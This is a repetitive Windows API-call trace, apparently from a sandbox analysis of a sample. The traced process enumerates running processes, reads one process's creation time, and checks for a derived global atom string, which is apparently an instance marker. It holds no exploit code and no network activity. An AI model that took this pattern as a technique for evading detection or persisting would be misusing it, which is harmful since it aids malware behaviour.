	[0094.006] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.006] CloseHandle (hObject=0x248) returned 1
	[0094.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.006] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.006] CloseHandle (hObject=0x248) returned 1
	[0094.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.007] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.007] CloseHandle (hObject=0x248) returned 1
	[0094.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.007] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.007] CloseHandle (hObject=0x248) returned 1
	[0094.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.007] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.007] CloseHandle (hObject=0x248) returned 1
	[0094.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.007] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.007] CloseHandle (hObject=0x248) returned 1
	[0094.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.007] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.007] CloseHandle (hObject=0x248) returned 1
	[0094.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.007] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.007] CloseHandle (hObject=0x248) returned 1
	[0094.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.008] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.008] CloseHandle (hObject=0x248) returned 1
	[0094.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.008] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.008] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.008] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.008] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.009] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.009] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.009] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.009] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.009] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.009] CloseHandle (hObject=0x248) returned 1
	[0094.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.010] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.010] CloseHandle (hObject=0x248) returned 1
	[0094.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.093] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.093] CloseHandle (hObject=0x248) returned 1
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.093] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.094] CloseHandle (hObject=0x248) returned 1
	[0094.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.094] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.094] CloseHandle (hObject=0x248) returned 1
	[0094.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.094] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.094] CloseHandle (hObject=0x248) returned 1
	[0094.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.094] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.094] CloseHandle (hObject=0x248) returned 1
	[0094.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.094] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.094] CloseHandle (hObject=0x248) returned 1
	[0094.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.095] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.095] CloseHandle (hObject=0x248) returned 1
	[0094.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.095] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.095] CloseHandle (hObject=0x248) returned 1
	[0094.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.095] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.095] CloseHandle (hObject=0x248) returned 1
	[0094.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.095] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.095] CloseHandle (hObject=0x248) returned 1
	[0094.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.095] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.095] CloseHandle (hObject=0x248) returned 1
	[0094.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.096] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.096] CloseHandle (hObject=0x248) returned 1
	[0094.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.096] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.096] CloseHandle (hObject=0x248) returned 1
	[0094.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.096] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.096] CloseHandle (hObject=0x248) returned 1
	[0094.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.096] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.096] CloseHandle (hObject=0x248) returned 1
	[0094.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.096] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.096] CloseHandle (hObject=0x248) returned 1
	[0094.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.097] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.097] CloseHandle (hObject=0x248) returned 1
	[0094.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.097] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.097] CloseHandle (hObject=0x248) returned 1
	[0094.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.097] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.097] CloseHandle (hObject=0x248) returned 1
	[0094.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.097] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.097] CloseHandle (hObject=0x248) returned 1
	[0094.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.097] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.097] CloseHandle (hObject=0x248) returned 1
	[0094.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.097] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.097] CloseHandle (hObject=0x248) returned 1
	[0094.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.098] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.098] CloseHandle (hObject=0x248) returned 1
	[0094.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.098] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.098] CloseHandle (hObject=0x248) returned 1
	[0094.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.098] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.098] CloseHandle (hObject=0x248) returned 1
	[0094.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.098] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.098] CloseHandle (hObject=0x248) returned 1
	[0094.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.098] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.098] CloseHandle (hObject=0x248) returned 1
	[0094.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.099] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.099] CloseHandle (hObject=0x248) returned 1
	[0094.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.099] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.099] CloseHandle (hObject=0x248) returned 1
	[0094.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.099] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.099] CloseHandle (hObject=0x248) returned 1
	[0094.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.099] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.099] CloseHandle (hObject=0x248) returned 1
	[0094.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.099] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.100] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.100] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.100] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.100] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.100] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.100] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.100] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.100] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.100] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.101] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.101] CloseHandle (hObject=0x248) returned 1
	[0094.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.101] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.101] CloseHandle (hObject=0x248) returned 1
	[0094.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.176] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.176] CloseHandle (hObject=0x248) returned 1
	[0094.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.177] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.177] CloseHandle (hObject=0x248) returned 1
	[0094.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.177] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.177] CloseHandle (hObject=0x248) returned 1
	[0094.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.177] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.177] CloseHandle (hObject=0x248) returned 1
	[0094.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.177] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.177] CloseHandle (hObject=0x248) returned 1
	[0094.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.178] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.178] CloseHandle (hObject=0x248) returned 1
	[0094.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.178] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.178] CloseHandle (hObject=0x248) returned 1
	[0094.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.178] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.178] CloseHandle (hObject=0x248) returned 1
	[0094.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.178] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.178] CloseHandle (hObject=0x248) returned 1
	[0094.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.178] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.178] CloseHandle (hObject=0x248) returned 1
	[0094.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.179] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.179] CloseHandle (hObject=0x248) returned 1
	[0094.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.179] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.179] CloseHandle (hObject=0x248) returned 1
	[0094.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.179] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.179] CloseHandle (hObject=0x248) returned 1
	[0094.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.179] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.179] CloseHandle (hObject=0x248) returned 1
	[0094.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.179] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.179] CloseHandle (hObject=0x248) returned 1
	[0094.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.180] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.180] CloseHandle (hObject=0x248) returned 1
	[0094.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.180] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.180] CloseHandle (hObject=0x248) returned 1
	[0094.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.180] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.180] CloseHandle (hObject=0x248) returned 1
	[0094.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.180] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.180] CloseHandle (hObject=0x248) returned 1
	[0094.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.180] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.180] CloseHandle (hObject=0x248) returned 1
	[0094.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.180] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.180] CloseHandle (hObject=0x248) returned 1
	[0094.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.181] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.181] CloseHandle (hObject=0x248) returned 1
	[0094.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.181] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.181] CloseHandle (hObject=0x248) returned 1
	[0094.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.181] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.181] CloseHandle (hObject=0x248) returned 1
	[0094.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.181] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.181] CloseHandle (hObject=0x248) returned 1
	[0094.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.181] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.182] CloseHandle (hObject=0x248) returned 1
	[0094.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.182] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.182] CloseHandle (hObject=0x248) returned 1
	[0094.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.182] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.182] CloseHandle (hObject=0x248) returned 1
	[0094.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.182] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.182] CloseHandle (hObject=0x248) returned 1
	[0094.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.182] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.182] CloseHandle (hObject=0x248) returned 1
	[0094.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.182] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.182] CloseHandle (hObject=0x248) returned 1
	[0094.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
